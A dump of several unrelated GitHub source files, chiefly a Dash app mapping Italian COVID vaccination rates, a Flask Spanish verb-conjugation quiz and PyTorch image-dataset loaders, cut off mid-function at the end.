https://github.com/openpolis/geojson-italy\n\n# load libs\nfrom dash.dependencies import Input, Output, State\nimport dash_html_components as html\nimport dash_core_components as dcc\nimport plotly.graph_objects as go\nimport plotly.express as px\nimport geopandas as gpd\nimport pandas as pd\n#import numpy as np\nfrom numerize.numerize import numerize\nimport dash, sys, json, requests\n\n# load geojson\nitaly_regions_url = \"https://raw.githubusercontent.com/openpolis/geojson-italy/master/geojson/limits_IT_regions.geojson\"\nitaly_geojson = requests.get(italy_regions_url).json()\nfor region in italy_geojson['features']:\n region[\"properties\"]['codice_regione_ISTAT'] = region[\"properties\"]['reg_istat_code_num']\nitaly_regions = gpd.GeoDataFrame.from_features(italy_geojson[\"features\"])\n\n# load data\nvaccine_data_url = \"https://raw.githubusercontent.com/italia/covid19-opendata-vaccini/master/dati/somministrazioni-vaccini-summary-latest.csv\"\ndf = pd.read_csv(vaccine_data_url)\nlasDate = df['data_somministrazione'].max()\ndf = df.groupby(['codice_regione_ISTAT', 'nome_area'], as_index=False)[['totale', 'sesso_maschile', 'sesso_femminile', 'prima_dose', 'seconda_dose']].agg('sum')\n\n# get italian population and mix on df\npi = pd.read_csv(\"data/italian_population.csv\")\nfor type in ['totale', 'maschi', 'femmine']:\n tmp = pi.loc[pi['sesso'].values==type].copy()\n tmp.drop('sesso', axis='columns', inplace=True)\n tmp = tmp.rename(columns={\"totale_abitanti\": f\"{type}_abitanti\"})\n df = df.merge(tmp, on=\"codice_regione_ISTAT\")\n\n# mix the map\ngeo_df = italy_regions.merge(df, on=\"codice_regione_ISTAT\").set_index(\"reg_name\")\n\n# generate density\ngeo_df[\"area\"] = round(geo_df.area * 10000, 0)\ngeo_df[\"densita\"] = round(geo_df.totale_abitanti/geo_df[\"area\"], 0)\nfor field, populationfield in [('totale', 'totale'), ('sesso_maschile', 'maschi'), ('sesso_femminile', 'femmine'), ('prima_dose', 'totale'), ('seconda_dose', 'totale')]:\n geo_df[f\"perc_vac_{field}\"] = round((100*geo_df[field])/geo_df[f\"{populationfield}_abitanti\"], 2)\n\n#geo_df[\"vctot_on_densita\"] = geo_df[\"totale\"]/geo_df[\"area\"]\n#geo_df[\"vctot_on_densita\"] = np.round(np.interp(geo_df[\"vctot_on_densita\"], (geo_df[\"vctot_on_densita\"].min(), geo_df[\"vctot_on_densita\"].max()), (0, 100)), 2)\n\nexternal_stylesheets = [\n { 'href': 'https://cdn.jsdelivr.net/npm/bulma@0.9.2/css/bulma-rtl.min.css', 'rel': 'stylesheet' },\n { 'href': 'https://cdn.jsdelivr.net/npm/bulma-divider@0.2.0/dist/css/bulma-divider.min.css', 'rel': 'stylesheet' },\n { 'href': 'https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css', 'rel': 'stylesheet' },\n { 'href': 'static/custom.css', 'rel': 'stylesheet' }\n]\n\napp = dash.Dash(\n __name__,\n external_stylesheets=external_stylesheets\n)\napp.title = \"Covid Vaccination Italy\"\n\nfield2show = [\n {'label': 'Percentuale Vaccinati Totale', 'value': 'perc_vac_totale'},\n #d{'label': 'Totale Vaccinati su Desità', 'value': 'vctot_on_densita'},\n {'label': 'Percentuale Vaccinati 1ᵃ dose', 'value': 'perc_vac_prima_dose'},\n {'label': 'Percentuale Vaccinati 2ᵃ dose', 'value': 'perc_vac_seconda_dose'},\n {'label': 'Percentuale Vaccinati Maschi', 'value': 'perc_vac_sesso_maschile'},\n {'label': 'Percentuale Vaccinati Femmine', 'value': 'perc_vac_sesso_femminile'},\n {'label': 'Totale', 'value': \"totale\"},\n {'label': 'Sesso Maschile', 'value': \"sesso_maschile\"},\n {'label': 'Sesso Femminile', 'value': \"sesso_femminile\"},\n {'label': 'Prima Dose', 'value': \"prima_dose\"},\n {'label': 'Seconda Dose', 'value': \"seconda_dose\"}\n]\n\napp.layout = html.Div([\n html.Div([], className=\"is-hidden\", id=\"hidden\"),\n html.Div([\n html.Div([\n html.H1([\"Covid Vaccination Italy\"], className=\"title is-1 has-text-centered\"),\n html.H1([\n \"Made with \",\n html.A([\"Geopandas\"], className=\"has-text-primary\", href=\"https://geopandas.org/index.html\", target=\"_blank\"),\n \" X \",\n html.A([\"Dash\"], className=\"has-text-info\", href=\"https://dash.plotly.com/introduction\", target=\"_blank\")\n ], className=\"subtitle is-1 has-text-centered\"),\n html.Div([\n html.Div([\n html.Div([\n html.Div([\n html.P([html.Span([html.I([], className=\"fas fa-clipboard-list\")], className=\"icon has-text-info\"), \" Selectors\"], className=\"is-size-4 mb-4\"),\n html.P([html.Span([html.I([], className=\"fas fa-map\")], className=\"icon has-text-primary\"), \" Field for Map 1\"], className=\"is-size-6 has-text-grey-light has-text-left\"),\n dcc.Dropdown(\n id = 'field2showMap1', clearable=False,\n options = field2show,\n value = field2show[0]['value']\n ),\n\n html.Br(),\n html.P([html.Span([html.I([], className=\"fas fa-map\")], className=\"icon has-text-primary-dark\"), \" Field for Map 2\"], className=\"is-size-6 has-text-grey-light has-text-left\"),\n dcc.Dropdown(\n id = 'field2showMap2', clearable=False,\n options = field2show,\n value = field2show[1]['value']\n ),\n\n html.Br(),\n html.P([html.Span([html.I([], className=\"fas fa-ruler\")], className=\"icon\"), \" Max Km square\"], className=\"is-size-6 has-text-grey-light has-text-left\"),\n dcc.RangeSlider(id = \"range_square_km\"),\n\n html.Br(),\n html.P([html.Span([html.I([], className=\"fas fa-users\")], className=\"icon\"), \" Max Density\"], className=\"is-size-6 has-text-grey-light has-text-left\"),\n dcc.RangeSlider(id = \"range_density\")\n ])\n ], className=\"column is-3\", style={\"position\": \"relative\"}),\n html.Div(className=\"is-divider-vertical px-3\"),\n html.Div([\n html.P([html.Span([html.I([], className=\"fas fa-map\")], className=\"icon has-text-primary\"), \" Map 1\"], className=\"is-size-4\"),\n dcc.Loading(\n type=\"circle\",\n children=html.Div([dcc.Graph(id=\"map1\")], style={\"minHeight\":\"300px\"})\n )\n ], className=\"column\"),\n html.Div(className=\"is-divider-vertical px-3\"),\n html.Div([\n html.P([html.Span([html.I([], className=\"fas fa-map\")], className=\"icon has-text-primary-dark\"), \" Map 2\"], className=\"is-size-4\"),\n dcc.Loading(\n type=\"circle\",\n children=html.Div([dcc.Graph(id=\"map2\")], style={\"minHeight\":\"300px\"})\n )\n ], className=\"column\")\n ], className=\"columns is-gapless\"),\n html.Div(className=\"is-divider my-3\"),\n html.Div([\n html.Div([\n html.P([html.Span([html.I([], className=icon)], className=\"icon\"), f\" \", label], className=\"is-size-7 has-text-grey-light\"),\n html.P([value], className=\"is-size-4 has-text-info has-text-weight-bold\", id=id)\n ], className=\"column\")\n for label, value, id, icon in [\n (u\"Max Km\\u00B2\", 0, \"display_min_square_km\", \"fas fa-ruler\"),\n (u\"Max Km\\u00B2\", 0, \"display_max_square_km\", \"fas fa-ruler\"),\n (u\"Min Ab/Km\\u00B2\", 0, \"display_min_density\", \"fas fa-users\"),\n (u\"Max Ab/Km\\u00B2\", 0, \"display_max_density\", \"fas fa-users\"),\n (\"Total vaccinated\", numerize(int(geo_df[\"totale\"].sum())), \"\", \"fas fa-syringe\"),\n (\"Percent Vacinnated\", f'{round((100*int(geo_df[\"totale\"].sum()))/int(geo_df[\"totale_abitanti\"].sum()), 2)}%', \"\", \"fas fa-percentage\"),\n (\"Last update\", lasDate, \"\", \"far fa-calendar-alt\")\n ]\n ], className=\"columns\")\n ], className=\"box\"),\n dcc.Markdown('''\n Example of code\n ```py\n import pandas as pd\n import geopandas as gpd\n\n vaccine_data_url = \"https://raw.githubusercontent.com/italia/covid19-opendata-vaccini/master/dati/somministrazioni-vaccini-summary-latest.csv\"\n italy_regions_url = \"https://raw.githubusercontent.com/openpolis/geojson-italy/master/geojson/limits_IT_regions.geojson\"\n\n df = pd.read_csv(vaccine_data_url)\n df = df.groupby(['codice_regione_ISTAT'], as_index=False)[['totale', 'sesso_maschile', 'sesso_femminile']].agg('sum')\n\n italy_regions = requests.get(italy_regions_url).json()\n for region in italy_regions['features']:\n region[\"properties\"]['codice_regione_ISTAT'] = region[\"properties\"]['reg_istat_code_num']\n italy_regions = gpd.GeoDataFrame.from_features(italy_regions[\"features\"])\n\n geo_df = italy_regions.merge(df, on=\"codice_regione_ISTAT\").set_index(\"reg_name\")\n geo_df.plot(\"totale\")\n ```\n ''', className=\"has-text-left\")\n ], className=\"container has-text-centered maxWidth\")\n ], className=\"hero-body\"),\n html.Footer([\n html.P([\"Made by \", html.A([\"@forno96\"], href=\"https://github.com/forno96\", target=\"_blank\")], className=\"has-text-centered\"),\n html.Br(), html.Br(),\n html.Div([\n html.A([html.Span([html.I([], className=_[2])], className=\"icon\"), f\" {_[0]}\"], href=_[1], target=\"_blank\", className=\"column\")\n for _ in [\n (\"Css by Bulma\", \"https://bulma.io\", \"fab fa-css3-alt has-text-primary\"),\n (\"Icons by Font Awesome\", \"https://fontawesome.com/\", \"fab fa-font-awesome has-text-info\"),\n (\"Vaccine data\", \"https://github.com/italia/covid19-opendata-vaccini\", \"fas fa-syringe has-text-success\"),\n (\"Italy map\", \"https://github.com/openpolis/geojson-italy\", \"fas fa-map has-text-warning\"),\n (\"People data\", \"http://dati.istat.it/Index.aspx?DataSetCode=DCIS_POPRES1\", \"fas fa-users has-text-danger\")\n ]\n ], className=\"content has-text-centered columns is-centered\")\n ], className=\"footer\")\n], className=\"hero is-fullheight\")\n\n\n@app.callback(\n Output('range_square_km', 'marks'),\n Output('range_square_km', 'min'),\n Output('range_square_km', 'max'),\n Output('range_square_km', 'value'),\n Input('hidden', 'children')\n)\ndef loadRangeSquareKM(hidden):\n return loadSlider(\"area\", u\"Km\\u00B2\")\n@app.callback(\n Output('range_density', 'marks'),\n Output('range_density', 'min'),\n Output('range_density', 'max'),\n Output('range_density', 'value'),\n Input('hidden', 'children')\n)\ndef loadRangeDensity(hidden):\n return loadSlider(\"densita\", u\"Ab/Km\\u00B2\")\n\n@app.callback(\n Output('display_min_square_km', 'children'),\n Output('display_max_square_km', 'children'),\n Input('range_square_km', 'value'),\n prevent_initial_call=True\n)\ndef diplayOnGauge(maxSquareKm):\n return numerize(maxSquareKm[0]), numerize(maxSquareKm[1])\n@app.callback(\n Output('display_min_density', 'children'),\n Output('display_max_density', 'children'),\n Input('range_density', 'value'),\n prevent_initial_call=True\n)\ndef diplayOnGauge(maxDensity):\n return numerize(maxDensity[0]), numerize(maxDensity[1])\n\n@app.callback(\n Output('map1', 'figure'),\n Input('field2showMap1', 'value'),\n Input('range_square_km', 'value'),\n Input('range_density', 'value'),\n State('field2showMap2', 'value'),\n prevent_initial_call=True\n)\ndef displayMap1(field, maxSquareKm, maxDensity, compareField):\n return diplayMap(field, maxSquareKm[0], maxSquareKm[1], maxDensity[0], maxDensity[1], compareField)\n@app.callback(\n Output('map2', 'figure'),\n Input('field2showMap2', 'value'),\n Input('range_square_km', 'value'),\n Input('range_density', 'value'),\n State('field2showMap1', 'value'),\n prevent_initial_call=True\n)\ndef displayMap2(field, maxSquareKm, maxDensity, compareField):\n return diplayMap(field, maxSquareKm[0], maxSquareKm[1], maxDensity[0], maxDensity[1], compareField)\n\n#/km^2\ndef loadSlider(field, measure):\n max = int(geo_df[field].max())\n min = int(geo_df[field].min())\n marks={\n min: f\"{numerize(min)} {measure}\",\n max: f\"{numerize(max)} {measure}\"\n }\n value=[min, max]\n return marks, min, max, value\n\ndef diplayMap(field, minSquareKm, maxSquareKm, minDensity, maxDensity, compareField):\n hover_data = list(set(['area', 'totale', 'densita', 'perc_vac_totale', field, compareField]))\n\n mask = (minSquareKm <= geo_df['area']) & (geo_df['area'] <= maxSquareKm) & (minDensity <= geo_df['densita']) & (geo_df['densita'] <= maxDensity)\n tmp = geo_df.loc[mask]\n\n fig = px.choropleth_mapbox(\n tmp,\n geojson=tmp.geometry,\n locations=tmp.index,\n hover_data=hover_data,\n color=field,\n color_continuous_scale=px.colors.sequential.GnBu,\n opacity=0.5,\n center={\"lat\": 41.8719, \"lon\": 12.5694}, zoom=4,\n mapbox_style=\"carto-positron\",\n labels={'area':'Area', 'densita':'Densità', 'perc_vac_totale': 'Percentuale vaccinati', 'perc_vac_sesso_maschile': 'Percentuale vac. maschi', 'perc_vac_sesso_femminile': 'Percentuale vac. femmine','reg_name': 'Regione', 'totale': 'Totale', 'prima_dose': 'Prima dose', 'seconda_dose': 'Seconda dose', 'sesso_maschile': 'Sesso maschile', 'sesso_femminile': 'Sesso femminile', 'categoria_operatori_sanitari_sociosanitari': 'Operatori sanitari', 'categoria_personale_non_sanitario': 'Personale non sanitario', 'categoria_ospiti_rsa': 'Ospiti rsa', 'categoria_personale_scolastico': 'Personale scolastico', 'categoria_60_69': '60/69', 'categoria_over80': 'Over 80', 'categoria_soggetti_fragili': 'Soggetti fragili', 'categoria_forze_armate': 'Forze armate', 'categoria_altro': 'Altro'}\n )\n fig.update_layout(margin=dict(b=0,t=40,l=0,r=0))\n\n return fig\n\nif __name__ == '__main__':\n app.run_server(host=\"0.0.0.0\", debug=True)\n","repo_name":"forno96/geopandasXdash","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":14700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32426503176","text":"from flask import Flask, render_template, request, redirect, url_for\nimport random\nimport json\nimport conjugador\n\n#Importar dados de um arquivo .json\nwith open(\"dados.json\", \"r\", encoding='utf-8') as a:\n DADOS_QUESTÕES = json.load(a)\n\nTIPOS_PERGUNTAS = [\"Completa la oración con la conjugación correcta del verbo\", \n\"¿Es correcta la conjugación del verbo en el presente del indicativo en esta oración?\"]\n\napp = Flask(__name__)\nrespCerta = \"\"\n\ndef reset():\n global questoesVistas, qAtual, acertos, dataQVistas\n questoesVistas = []\n qAtual = 0\n acertos = 0\n dataQVistas = [0, 0, 0, 0]\n\ndef novaQuestao(ovrd=-1):\n global questoesVistas, qAtual, dataQVistas, tipoQuestao\n if ovrd == -1:\n qAtual += 1\n\n q = 0\n while True: #Criar uma nova questão ainda não vista\n q = random.randint(1, len(DADOS_QUESTÕES))\n if [q, False] not in questoesVistas and [q, True] not in questoesVistas:\n break\n else:\n q = ovrd\n \n if [q, False] not in questoesVistas and [q, True] not in questoesVistas:\n questoesVistas.append([q, False])\n tipoQuestao = DADOS_QUESTÕES[q-1][\"pergunta\"]\n\n if tipoQuestao == 0:\n if ovrd == -1:\n dataQVistas[1] += 1\n pergunta, frase, verbo, respCerta = DADOS_QUESTÕES[q-1].values()\n\n opcoes = conjugador.conjugacoes(DADOS_QUESTÕES[q-1]['verbo']) #Gerar as opções de conjugação\n escolhidas = []\n ic = opcoes.index(respCerta)\n while len(escolhidas) < 4: #Gerar itens aleatórios de acordo com as conjugações do verbo\n r = random.randint(0, len(opcoes)-1)\n if r not in escolhidas:\n escolhidas.append(r)\n if len(escolhidas) == 4 and ic not in escolhidas: #Caso a opção correta não tenha sido gerada, substituir um dos itens por ela\n escolhidas[random.randint(0, 3)] = ic\n \n estado = []\n respCerta = \"ABCD\"[escolhidas.index(ic)]\n for i in \"ABCD\":\n if i == respCerta: #Atualizar estado para fins do css\n estado.append(\"certa\")\n else:\n estado.append(\"\")\n \n alts = []\n for i in escolhidas:\n alts.append(opcoes[i])\n return [pergunta, frase, verbo, alts, respCerta, estado]\n else:\n if ovrd == -1:\n dataQVistas[3] += 1\n alts = [\"Verdadero\", \"Falso\"]\n\n pergunta, frase, respCerta = DADOS_QUESTÕES[q-1].values()\n estado = []\n for i in alts:\n if i == respCerta:\n estado.append(\"certa\")\n else:\n estado.append(\"\")\n return [pergunta, frase, respCerta, estado]\n\ndef processarQuestao(questao):\n global respCerta, dataQVistas, qAtual\n acertos = dataQVistas[0] + dataQVistas[2]\n vistas = dataQVistas[1] + dataQVistas[3]\n print(dataQVistas)\n #Gerenciar os botões de ir e voltar estarem habilitados\n dis = [\"\", \"\"]\n if qAtual == 1:\n dis[0] = 'disabled'\n if qAtual >= vistas:\n dis[1] = 'disabled'\n \n #Receber os dados e renderizar a página correta de acordo com o tipo da questão\n if questao[0] == 0:\n pergunta, frase, verbo, escolhidas, respCerta, estado = questao\n return render_template(\"telaquestao.html\", \n qAtual=qAtual, \n enunciado=f\"{TIPOS_PERGUNTAS[pergunta]} {verbo}: {frase}\", \n itens=escolhidas,\n estado=estado, \n acertos=acertos, \n roteador=roteador,\n disabled=dis\n )\n else:\n pergunta, frase, respCerta, estado = questao\n return render_template(\"telaquestao2.html\", \n qAtual=qAtual, \n enunciado=f'{TIPOS_PERGUNTAS[pergunta]}',\n frase= frase,\n estado=estado,\n acertos=acertos, \n roteador=roteador,\n disabled=dis\n )\n\ndef roteador(tela):\n return url_for(f'{tela}')\n\n@app.route('/')\ndef home():\n return redirect('/inicio') #Redirecionar a página vazia para o início\n\n@app.route('/inicio', methods =[\"GET\", \"POST\"])\ndef inicio():\n reset()\n return render_template(\"inicio.html\", roteador=roteador)\n\n@app.route('/explicacao', methods =[\"GET\", \"POST\"])\ndef explicacao():\n return render_template(\"explicacao.html\", roteador=roteador)\n\n@app.route('/resultados', methods =[\"GET\", \"POST\"])\ndef resultados():\n global dataQVistas\n return render_template(\"resultados.html\", roteador=roteador, completar=dataQVistas[0:2], verdFalso=dataQVistas[2:4])\n\n@app.route('/questao', methods =[\"GET\", \"POST\"])\ndef questao():\n global tipoQuestao, dataQVistas, qAtual\n\n if 'questoesVistas' not in globals():\n reset()\n\n if len(questoesVistas) == 15:\n return redirect('resultados')\n \n if request.method == \"GET\":\n if len(questoesVistas) == 0:\n questao = novaQuestao()\n return processarQuestao(questao)\n \n if request.method == \"POST\":\n formRes = []\n if request.form.keys():\n formRes = list(request.form.keys())[0]\n \n if formRes in [\"vquestao\", \"aquestao\"]: #Se não for navegando pelas questões\n if formRes == \"vquestao\":\n if qAtual > 1:\n qAtual -= 1\n else:\n if qAtual < len(questoesVistas):\n qAtual += 1\n questao = novaQuestao(ovrd=questoesVistas[qAtual-1][0])\n else:\n if formRes != \"botaoproximo\" or qAtual == 0:\n if formRes == respCerta:\n dataQVistas[tipoQuestao*2] += 1\n questao = novaQuestao()\n\n if 'questao' not in locals():\n qAtual = len(questoesVistas)\n questao = novaQuestao(ovrd=questoesVistas[-1][0])\n return processarQuestao(questao)\n \n\nif __name__ == '__main__':\n app.run(debug=True, host=\"0.0.0.0\")","repo_name":"Maruquitus/Trabalho-de-Espanhol","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5929,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"26485199701","text":"\"\"\"downsample one or more signatures\"\"\"\n\nimport sys\n\nfrom sourmash.cli.utils import add_moltype_args, add_ksize_arg\n\n\ndef subparser(subparsers):\n subparser = subparsers.add_parser('downsample')\n subparser.add_argument('signatures', nargs=\"+\")\n subparser.add_argument(\n '--scaled', type=int, default=0,\n help='scaled value to downsample to'\n )\n subparser.add_argument(\n '--num', metavar='N', type=int, default=0,\n help='num value to downsample to'\n )\n subparser.add_argument(\n '-q', '--quiet', action='store_true',\n help='suppress non-error output'\n )\n subparser.add_argument(\n '-o', '--output', metavar='FILE',\n help='output signature to this file (default stdout)'\n )\n add_ksize_arg(subparser, 31)\n add_moltype_args(subparser)\n\n\ndef main(args):\n import sourmash\n return sourmash.sig.__main__.downsample(args)\n","repo_name":"Domedriver/sourmash","sub_path":"src/sourmash/cli/sig/downsample.py","file_name":"downsample.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"2781336745","text":"\"\"\"Metadata about the account.\"\"\"\n\nimport os\nfrom typing import Optional\n\ntry:\n import boto3\nexcept ImportError as err:\n raise ImportError(\n f\"Error: boto3 not installed, install extra 'pip install boto3 to read AWS account attributes. \\n{str(err)}\"\n ) from err\n\n\ndef get_aws_account_id() -> str:\n \"\"\"Get AWS account ID.\"\"\"\n aws_profile: Optional[str] = os.getenv(\"AWS_PROFILE\")\n\n if aws_profile:\n print(f\"Using AWS_PROFILE value from environment: {aws_profile}.\")\n else:\n print(\n \"Warning: AWS_PROFILE environment variable not set. Setting --profile has no effect. AWS access keys or RBAC will be used instead.\"\n )\n\n session = boto3.Session(profile_name=aws_profile)\n return session.client(\"sts\").get_caller_identity()[\"Account\"]\n","repo_name":"mlops-club/awscdk-clearml","sub_path":"src/cdk_clearml/utils/aws_account_info.py","file_name":"aws_account_info.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"74718114611","text":"\n\nclass WallMask(object):\n def __init__(self):\n self.tilesize = 20\n self.wallmask = set()\n\n def add(self,sprite): #only if apropiate\n padding = 1\n a = sprite.rotation%360\n if abs(a-90) < 45 or abs(a-270) < 45:\n w = sprite.height\n h = sprite.width\n else:\n w = sprite.width\n h = sprite.height\n sx = (sprite.x - w/2)/self.tilesize - padding\n sy = (sprite.y - h/2)/self.tilesize - padding\n for x in range(w/self.tilesize+1 + padding*2):\n for y in range(h/self.tilesize+1 + padding*2):\n key = int(sx+x),int(sy+y)\n self.wallmask.add(key)\n\n\n def is_empty(self,x,y):\n key = (int(x/self.tilesize),int(y/self.tilesize))\n result = not key in self.wallmask\n return result\n","repo_name":"luciotorre/aiamsori","sub_path":"gamelib/wallmask.py","file_name":"wallmask.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25291232362","text":"import json\n\nclass Store:\n\n def __init__(self):\n self.data = {}\n\n def set(self, key, value):\n self.data[key] = value\n\n def get(self, key):\n keys = key.split('.')\n result = self.data\n for k in keys:\n result = result.get(k)\n return result\n\n def update(self, key, value):\n keys = key.split('.')\n temp = self.data\n for k in keys[:-1]:\n temp = temp.get(k)\n temp[keys[-1]] = value\n\n def delete(self, key):\n keys = key.split('.')\n temp = self.data\n for k in keys[:-1]:\n temp = temp.get(k)\n del temp[keys[-1]]\n\nstore = Store()\nstore.set('user.name', 'John')\nprint(store.get('user.name'))\n\nstore.update('user.name', 'Jane')\nprint(store.get('user.name'))\n\nstore.delete('user.name')\nprint(store.get('user'))","repo_name":"spamulodd/lab2","sub_path":"60 задание.py","file_name":"60 задание.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18207902926","text":"from skimage import io, transform, img_as_float\nimport pandas as pd\nimport numpy as np\nimport json\nimport os\n\nimport torch\nfrom torchvision import transforms\nfrom torch.utils.data import Dataset\n\nclass ImageNet(Dataset):\n def __init__(self, file, min_class_id, max_class_id, transform, idx = -1):\n self.file = pd.read_csv(file)\n self.data = self.file.iloc[:, :]\n self.data = np.array(self.data)\n self.data = self.data[np.where(self.data[:,2] >= min_class_id)]\n self.data = self.data[np.where(self.data[:,2] <= max_class_id)]\n self.transform = transform\n self.image_idx = idx\n\n def __len__(self):\n return self.data.shape[0]\n\n def __getitem__(self, idx):\n if int(self.image_idx) !=-1:\n idx = int(self.image_idx)\n row_idx = self.data[idx]\n img_path = row_idx[0]\n class_id = row_idx[2]\n\n X = img_as_float(io.imread(img_path, as_gray=False)).astype(np.float32)\n img_size = X.shape\n bboxes = []\n sample = {'image': X, 'bboxes': bboxes, 'labels': class_id, 'image_path': img_path}\n if self.transform:\n sample = self.transform(sample)\n sample['image_size'] = img_size\n return sample\n\n\nclass MSCOCO_Dataset(Dataset):\n \"\"\"MSCOCO dataset.\"\"\"\n\n def __init__(self, json_file, transform=None, idx = -1):\n \"\"\"\n Args:\n json_file (string): Path to the json file with annotations.\n transform (callable, optional): Optional transform to be applied\n on a sample.\n \"\"\"\n self.annotations = pd.DataFrame.from_dict(json.load(open(json_file)), orient='index')\n self.annotations.reset_index(level=0, inplace=True)\n self.transform = transform\n self.image_idx = idx\n\n def __len__(self):\n return len(self.annotations)\n # return 1\n\n def __getitem__(self, idx, color=True):\n # idx = 0\n # print(idx)\n if int(self.image_idx) != -1:\n idx = int(self.image_idx)\n # print(idx)\n # idx = int(idx)\n # print(self.idx)\n img_name = self.annotations['image_path'][idx]\n # image = io.imread(img_name)\n img = img_as_float(io.imread(img_name, as_gray=not color)).astype(np.float32)\n img_size = img.shape\n if img.ndim == 2:\n img = img[:, :, np.newaxis]\n if color:\n img = np.tile(img, (1, 1, 3))\n elif img.shape[2] == 4:\n img = img[:, :, :3]\n bboxes = self.annotations['bbox_info'][idx]\n labels = self.annotations['classification_labels'][idx]\n sample = {'image': img, 'bboxes': bboxes, 'labels': labels, 'image_path': img_name}\n\n if self.transform:\n sample = self.transform(sample)\n\n sample = {'image': sample['image'], 'labels': sample['labels'], 'image_path':sample['image_path'], 'image_size': img_size, 'bboxes': sample['bboxes']}\n\n return sample\n\n def getSampleByImagePath(self, imgPath, color=True):\n record_from_json = self.annotations[self.annotations.image_path==imgPath]\n # from IPython.core.debugger import set_trace; set_trace()\n img_name = record_from_json.image_path.iloc[0] # record_from_json.image_path[0]\n # image = io.imread(img_name)\n img = img_as_float(io.imread(img_name, as_gray=not color)).astype(np.float32)\n if img.ndim == 2:\n img = img[:, :, np.newaxis]\n if color:\n img = np.tile(img, (1, 1, 3))\n elif img.shape[2] == 4:\n img = img[:, :, :3]\n bboxes = record_from_json.bbox_info.iloc[0]\n labels = record_from_json.classification_labels.iloc[0]\n sample = {'image': img, 'bboxes': bboxes, 'labels': labels, 'image_path': img_name}\n\n if self.transform:\n sample = self.transform(sample)\n\n return sample\n\nclass Rescale(object):\n \"\"\"Rescale the image in a sample to a given size.\n\n Args:\n output_size (tuple or int): Desired output size. If tuple, output is\n matched to output_size. If int, smaller of image edges is matched\n to output_size keeping aspect ratio the same.\n \"\"\"\n\n def __init__(self, output_size):\n assert isinstance(output_size, (int, tuple))\n self.output_size = output_size\n\n def __call__(self, sample):\n image = sample['image']\n\n h, w = image.shape[:2]\n if isinstance(self.output_size, int):\n if h > w:\n new_h, new_w = self.output_size * h / w, self.output_size\n else:\n new_h, new_w = self.output_size, self.output_size * w / h\n else:\n new_h, new_w = self.output_size\n\n new_h, new_w = int(new_h), int(new_w)\n\n img = transform.resize(image, (new_h, new_w), mode='reflect', anti_aliasing=False)\n\n bboxes = []\n \n if len(sample['bboxes']) != 0 :\n for annotation in sample['bboxes']:\n bbox = [0]*4\n bbox[0] = annotation['bbox'][0] * new_w / w\n bbox[1] = annotation['bbox'][1] * new_h / h\n bbox[2] = annotation['bbox'][2] * new_w / w\n bbox[3] = annotation['bbox'][3] * new_h / h\n\n # bboxes.append(bbox)\n bboxes.append({'bbox':bbox, 'category':annotation['category'], \\\n 'category_id':annotation['category_id'], 'class_id':annotation['class_id']})\n\n return {'image': img, 'bboxes': bboxes, 'labels': sample['labels'], 'image_path': sample['image_path']}\n\nclass ScaleIntensities(object):\n \"\"\"Convert image intensities to lie between 0 and 255.\"\"\"\n\n def __call__(self, sample, scale=255.0):\n image, labels = sample['image'], sample['labels']\n\n # Multiply the intensity values\n image = image*scale\n\n return {'image': image,\n 'labels': labels,\n 'image_path': sample['image_path'], 'bboxes': sample['bboxes']}\n\nclass MakeCHWformat(object):\n\n def __call__(self, sample):\n image, labels = sample['image'], sample['labels']\n\n # swap color axis because\n # numpy image: H x W x C\n # we need: C X H X W\n image = image.transpose((2, 0, 1))\n\n return {'image': image,\n 'labels': labels,\n 'image_path': sample['image_path'], 'bboxes': sample['bboxes']}\n\n\nclass RGBtoBGR(object):\n \"\"\"Convert image from RGB to BGR.\"\"\"\n\n def __call__(self, sample):\n image, labels = sample['image'], sample['labels']\n\n # swap RGB to BGR\n image = image[(2,1,0), :, :] # np.flip(image,axis=0).copy() # image[:,:,::-1]\n\n return {'image': image,\n 'labels': labels,\n 'image_path': sample['image_path'], 'bboxes': sample['bboxes']}\n\nclass ToTensor(object):\n \"\"\"Convert ndarrays in sample to Tensors.\"\"\"\n\n def __call__(self, sample):\n image, labels = sample['image'], sample['labels']\n\n\n\n return {'image': torch.from_numpy(image.astype(float)),\n 'labels': torch.from_numpy(np.asarray(labels)),\n 'image_path': sample['image_path'], 'bboxes': sample['bboxes']}\n\nclass Normalize(object):\n \"\"\"Normalize a tensor image with mean and standard deviation.\n Given mean: ``(M1,...,Mn)`` and std: ``(S1,..,Sn)`` for ``n`` channels, this transform\n will normalize each channel of the input ``torch.*Tensor`` i.e.\n ``input[channel] = (input[channel] - mean[channel]) / std[channel]``\n Args:\n mean (sequence): Sequence of means for each channel.\n std (sequence): Sequence of standard deviations for each channel. If None, it will not divide with std\n \"\"\"\n\n def __init__(self, mean, std=None):\n self.mean = mean\n self.std = std\n\n def __call__(self, sample):\n \"\"\"\n Args:\n tensor (Tensor): Tensor image of size (C, H, W) to be normalized.\n Returns:\n Tensor: Normalized Tensor image.\n \"\"\"\n image, labels = sample['image'], sample['labels']\n for channel in range(3):\n if self.std:\n image[channel] = (image[channel] - self.mean[channel]) / self.std[channel]\n else:\n image[channel] = image[channel] - self.mean[channel]\n return {'image': image, 'labels': sample['labels'], 'image_path': sample['image_path'], 'bboxes': sample['bboxes']}\n\n def __repr__(self):\n return self.__class__.__name__ + '(mean={0}, std={1})'.format(self.mean, self.std)\n\n\ndef load_MSCOCO_2014_json(mode,MSCOCO_Root_Path):\n return json.load(open(MSCOCO_Root_Path + 'annotations/instances_' + mode + '2014.json'))\n\ndef load_PASCAL_2012_json(mode,PASCAL_Root_Path):\n return json.load(open(PASCAL_Root_Path + 'VOC_JSON_From_COCO/pascal_' + mode + '2012.json'))\n\ndef load_PASCAL_2007_json(mode,PASCAL_Root_Path):\n return json.load(open(PASCAL_Root_Path + 